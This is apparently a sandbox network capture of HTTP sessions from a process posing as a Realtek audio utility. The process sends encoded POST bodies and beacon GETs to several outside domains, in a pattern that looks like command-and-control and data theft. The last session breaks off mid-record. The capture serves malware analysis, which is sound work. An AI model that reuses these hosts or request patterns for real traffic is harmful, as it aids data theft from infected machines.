                                                                            Data Ascii: 2O=yzleTXLhZhPoxN1xo7sRIOcnQgdi4IaljwYHpmZX0imbrZ1FssGiuep6L3numbkojmK2Up0XiRU8O1snMCKTBPxz/P48AgduVmnYs3FVe1A3JQVa7zRt/lMyybVsNvYTDd/wUMEtj0bGvxar19o1WIWtzzq+zZYpZxcWFPH26jiHDeCfL0BsUZyjYYtOLUK4eKdxUxMO8QH9yYtLfiOAcrI=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.11.20 | 49784 | 208.91.197.39 | 80 | 7608 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 18:57:11.942780972 CET | 2440 | OUT | POST /hxi5/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 7367
                                                                            Connection: close
                                                                            Host: www.jcsa.info
                                                                            Origin: http://www.jcsa.info
                                                                            Referer: http://www.jcsa.info/hxi5/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Dec 3, 2024 18:57:11.942831039 CET | 5475 | OUT |
                                                                            Data Ascii: gVVW1UjMjbPdxjKpmfnybfJdldS8csZHSfh7vr5p0Lt97ifzHL9jxezh5aPpYv/mg9wWJY+9UtQ6+hsuHvdO/ClJVVnAI9beDb9q6Mvze6iacXYekLStQZRylpiSg3FZfTgJbTqu76bd3jCiS4tiU3Ir/gl1UwDBxJinfOTkzClOrvZPAUfoibF7o6eMvlcRmPVZFEhKQCukTZjpacA7szafHMcpw15g6bTUdf3dj1ABnlheyxP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.11.20 | 49785 | 208.91.197.39 | 80 | 7608 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 18:57:14.628333092 CET | 483 | OUT | GET /hxi5/?2O=/xN+QifpSgLb8oJax+YyM6tUBGB4yp//ixYmgFld7FWiq7hEgfqLv69cCSKy7O4D9GLUZYEuvgkAAG4+HQzEHPV07OBsdCtve3vh4iUoSVc6KmBMx1Jirj8=&ChhG6=J-xs HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Connection: close
                                                                            Host: www.jcsa.info
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Dec 3, 2024 18:57:16.592514992 CET | 626 | IN | HTTP/1.0 500 Internal Server Error
                                                                            Date: Tue, 03 Dec 2024 17:57:14 GMT
                                                                            Server: Apache
                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                            Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                            Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                            Content-Length: 0
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.11.20 | 49786 | 43.205.198.29 | 80 | 7608 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 18:57:22.215358019 CET | 773 | OUT | POST /j8pv/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Connection: close
                                                                            Host: www.1secondlending.one
                                                                            Origin: http://www.1secondlending.one
                                                                            Referer: http://www.1secondlending.one/j8pv/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Ascii: 2O=EKGD+FNVk+GOOR3TuqK2g9X07mFPDDqdkW1dPm8Lu66/Ct7ClT5+1kj0rwNhPRc+QGGL62WPDRbCJWHMpJEz1Ap/YtMCRYJbOQzoffWa7x0WB1qEl2hmUfMwPWG+3yf92+rGaSpFJf5qDqpJzPPKz8boKQQ3w8fft+KU4fd8R0ZpWxzYR6a7YunHJlIQz1TE9w==
                                                                            Dec 3, 2024 18:57:22.567423105 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 03 Dec 2024 17:57:22 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 548
                                                                            Connection: close
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            38 | 192.168.11.20 | 49787 | 43.205.198.29 | 80 | 7608 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 3, 2024 18:57:25.097084045 CET | 793 | OUT | POST /j8pv/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Connection: close
                                                                            Host: www.1secondlending.one
                                                                            Origin: http://www.1secondlending.one
                                                                            Referer: http://www.1secondlending.one/j8pv/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Ascii: 2O=EKGD+FNVk+GOMxHToNW2o9Xz+mFPYzrWkW5dPisbvIe/CJ3CkS5+5Ej0gQNkLRc1QH7+6zWPDR/CJUfMpeQw1QpxQNMEf4JbOQzoffD97xsWCFaEmUJlXfM/OWG+mCf52+qraQdrJdBqDoxJ0ePJ68ajOQRp3/OzrNelzugnWXYSTn+CMIufb971NVx4x3Sfg65KFXTs8xqwZeclW20T64E=
                                                                            Dec 3, 2024 18:57:25.456001043 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 03 Dec 2024 17:57:25 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 548
                                                                            Connection: close
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            39 | 192.168.11.20 | 49788 | 43.205.198.29 | 80 | 7608 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 3, 2024 18:57:27.980456114 CET | 2578 | OUT | POST /j8pv/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 7367
                                                                            Connection: close
                                                                            Host: www.1secondlending.one
                                                                            Origin: http://www.1secondlending.one
                                                                            Referer: http://www.1secondlending.one/j8pv/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 18:57:28.329864979 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 03 Dec 2024 17:57:28 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 548
                                                                            Connection: close
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            40 | 192.168.11.20 | 49789 | 43.205.198.29 | 80 | 7608 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 3, 2024 18:57:30.858681917 CET | 492 | OUT | GET /j8pv/?ChhG6=J-xs&2O=JIuj9wxSnK6mEyWE+aiov6ee/jFUGAOavn5HAjA8ht24L6v+vQ9uqWj6ig59Dwg+VmGSo2u3Iy71OFL1070b+iEHSPgDI61AbnX1cIuegQgrBk3SzXJVVb4= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Connection: close
                                                                            Host: www.1secondlending.one
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 18:57:31.221328020 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 03 Dec 2024 17:57:31 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 548
                                                                            Connection: close
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            41 | 192.168.11.20 | 49790 | 172.67.187.114 | 80 | 7608 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 3, 2024 18:57:36.497899055 CET | 758 | OUT | POST /swhs/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Connection: close
                                                                            Host: www.zkdamdjj.shop
                                                                            Origin: http://www.zkdamdjj.shop
                                                                            Referer: http://www.zkdamdjj.shop/swhs/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Ascii: 2O=xz3VGnN6YJI+7xI+EeKUdICtNg12mabnjAfm2/uu/VwYkCDSph7R+tJQH6rmzIjQxRGgKl47BcLMhnUKDWfbQVojRgDzYPmLb0lTcPiAe17umYmRbgOjiap5waLKr5kPhMM5pi9zg6llZ4w6g4D+NUVpwhgPISY59daUtddKuYIYc1UExchqruro6thAiHPm9w==
                                                                            Dec 3, 2024 18:57:37.499919891 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 17:57:37 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            x-litespeed-tag: 02a_HTTP.404
                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                                            link: <https://zkdamdjj.shop/wp-json/>; rel="https://api.w.org/"
                                                                            x-litespeed-cache-control: no-cache
                                                                            vary: Accept-Encoding
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hw03VwLkAd0RF9MMaI8aynrzA5hNm0aQ%2FhhkhwME3YrGP3PQe88G8pDO%2BY9KZCbVblLTD%2B5GPRxTzjD8uvDJzeO97SgiBNrr9pCvhqCqMVDlfWXOewIIw%2F3dGeEnMtlxFSnh3g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8ec570a779243361-MIA
                                                                            Content-Encoding: gzip
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=126366&min_rtt=126366&rtt_var=63183&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=758&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.11.20 | 49791 | 172.67.187.114 | 80 | 7608 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 18:57:39.158487082 CET | 778 | OUT | POST /swhs/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Connection: close
                                                                            Host: www.zkdamdjj.shop
                                                                            Origin: http://www.zkdamdjj.shop
                                                                            Referer: http://www.zkdamdjj.shop/swhs/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Dec 3, 2024 18:57:40.298289061 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 17:57:40 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            x-litespeed-tag: 02a_HTTP.404
                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                                            link: <https://zkdamdjj.shop/wp-json/>; rel="https://api.w.org/"
                                                                            x-litespeed-cache-control: no-cache
                                                                            vary: Accept-Encoding
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aH3h5tIDtTo7sQb4DSextTZRSfeTV4p4%2B0GNO39lMMaUFmwZW9qNGcEnuZNhX2wUCbx7gvFQLhSr8kwLNUjeZFPEo7HnAfZCRZVubJKi8%2F3EpdyZvkxa5touSu0pNRNRIhY52Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8ec570b81aa9743a-MIA
                                                                            Content-Encoding: gzip
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=126373&min_rtt=126373&rtt_var=63186&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=778&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.11.20 | 49792 | 172.67.187.114 | 80 | 7608 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 18:57:41.814188004 CET | 2578 | OUT | POST /swhs/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 7367
                                                                            Connection: close
                                                                            Host: www.zkdamdjj.shop
                                                                            Origin: http://www.zkdamdjj.shop
                                                                            Referer: http://www.zkdamdjj.shop/swhs/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Dec 3, 2024 18:57:42.724123001 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 17:57:42 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            x-litespeed-tag: 02a_HTTP.404
                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                                            link: <https://zkdamdjj.shop/wp-json/>; rel="https://api.w.org/"
                                                                            x-litespeed-cache-control: no-cache
                                                                            vary: Accept-Encoding
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9bekwnpnHiCweh7hL9l30DQCIn9ZQSr%2BZC7Q19SXSaY5sr8MvXTObcGm8TL8MVEwLVmrLeQ%2F8LsQCDumdN2vjWgB6aCKOOnxbTxH9pKo0mc1g0QU01jXzhpRDlhyGMb%2B7KN%2FGA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8ec570c8b9478dfd-MIA
                                                                            Content-Encoding: gzip
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=126813&min_rtt=126813&rtt_var=63406&sent=5&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7927&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.11.20 | 49793 | 172.67.187.114 | 80 | 7608 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 18:57:44.470689058 CET | 487 | OUT | GET /swhs/?2O=8xf1FTtyUpYkrTYMR7SiSpjuEkVK44/qllrz0dKQmws7hy/+lCnqv8AjCvT/8dHN8wn+YkpcLfbwvxo0J0bTV1ZiQxCgHPOqTWlPXofsQEz+qrXGThT4v9Q=&ChhG6=J-xs HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Connection: close
                                                                            Host: www.zkdamdjj.shop
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Dec 3, 2024 18:57:45.448976994 CET | 1272 | IN | HTTP/1.1 301 Moved Permanently
                                                                            Date: Tue, 03 Dec 2024 17:57:45 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                                            x-redirect-by: WordPress
                                                                            location: https://zkdamdjj.shop/swhs/?2O=8xf1FTtyUpYkrTYMR7SiSpjuEkVK44/qllrz0dKQmws7hy/+lCnqv8AjCvT/8dHN8wn+YkpcLfbwvxo0J0bTV1ZiQxCgHPOqTWlPXofsQEz+qrXGThT4v9Q=&ChhG6=J-xs
                                                                            x-litespeed-cache-control: public,max-age=3600
                                                                            x-litespeed-tag: 02a_HTTP.404,02a_HTTP.301,02a_404,02a_URL.9b9a69d1fac6b11918e507384a598f21,02a_
                                                                            x-litespeed-cache: miss
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7LCKfwXYIFJRAs1oUloK7hJkRUhQiQPV7oWV7qZcoaTsuw%2BHLeb99T9AdivxJpWUoEVFS%2B8LQsDsnfTxJxnSrtptyR5BW8C3oIZ8vJIqup%2BdFAssBZS0llLDLq7ZbIbHk1RXlg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8ec570d95cd95c67-MIA
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=126953&min_rtt=126953&rtt_var=63476&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=487&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.11.20 | 49794 | 104.21.57.248 | 80 | 7608 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 18:57:50.758130074 CET | 770 | OUT | POST /8gp4/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Connection: close
                                                                            Host: www.rgenerousrs.store
                                                                            Origin: http://www.rgenerousrs.store
                                                                            Referer: http://www.rgenerousrs.store/8gp4/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Dec 3, 2024 18:57:51.285345078 CET | 1082 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 17:57:51 GMT
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EoCW232EuO0Bk0uqaGzxdC211O969fmJhDI5v4KRKVQEdGzhoj3KmWqjsu0RGRBsfVB%2BKNubf9p20R00Q9gE3FZwYLtyX1jSh8bQZUR3HT2NqeYVTRQ%2BH6SCwy7aHzZjFO3hmngqPQU%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8ec571009b465c6b-MIA
                                                                            Content-Encoding: gzip
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=126450&min_rtt=126450&rtt_var=63225&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=770&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Dec 3, 2024 18:57:51.285422087 CET | 16 | IN | Data Raw: 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a
                                                                            Data Ascii: b*
                                                                            Dec 3, 2024 18:57:51.285510063 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            46 | 192.168.11.20 | 49795 | 104.21.57.248 | 80 | 7608 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 3, 2024 18:57:53.404745102 CET | 790 | OUT | POST /8gp4/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Connection: close
                                                                            Host: www.rgenerousrs.store
                                                                            Origin: http://www.rgenerousrs.store
                                                                            Referer: http://www.rgenerousrs.store/8gp4/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Ascii: 2O=IG25VTF5RrEDhx8/3yuT6eI4vZHhcuhPybwE1/FaZiVz+mkAdbywt2oHpI8I+cF6I6Db07niPiwWpyaT98W/G1vSFHp0shxeELDX40RAAz0OZvOecBtV8sS9PUB55WYZTpqwMCBa9CZwbsmeqLvzzB5H1/sHfPU+8bRf5pupe9zG53O8lOEw00IjPgBga6LbP9TRjO2rfEgnylBl0ufeB38=
                                                                            Dec 3, 2024 18:57:53.924298048 CET | 1086 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 17:57:53 GMT
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jFp%2Fh0lJmMUcCwHLUbIN28YRo%2BNEfPQbqXL%2B9vHhWK9a38RvMguNmfe4gZ3qos%2BbwscuFYZoLz17DcGZYhXuSwyoZMV08BpcBi3uzOSm5oDyMEysOM9PeH7Mj99AYTkOfQALQ2oeoQk%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8ec571112a6c9ab4-MIA
                                                                            Content-Encoding: gzip
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=126055&min_rtt=126055&rtt_var=63027&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=790&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Dec 3, 2024 18:57:53.924343109 CET | 16 | IN | Data Raw: 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a
                                                                            Data Ascii: b*
                                                                            Dec 3, 2024 18:57:53.924376965 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            47 | 192.168.11.20 | 49796 | 104.21.57.248 | 80 | 7608 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 3, 2024 18:57:56.060842991 CET | 1289 | OUT | POST /8gp4/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 7367
                                                                            Connection: close
                                                                            Host: www.rgenerousrs.store
                                                                            Origin: http://www.rgenerousrs.store
                                                                            Referer: http://www.rgenerousrs.store/8gp4/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 18:57:56.060902119 CET | 5156 | OUT
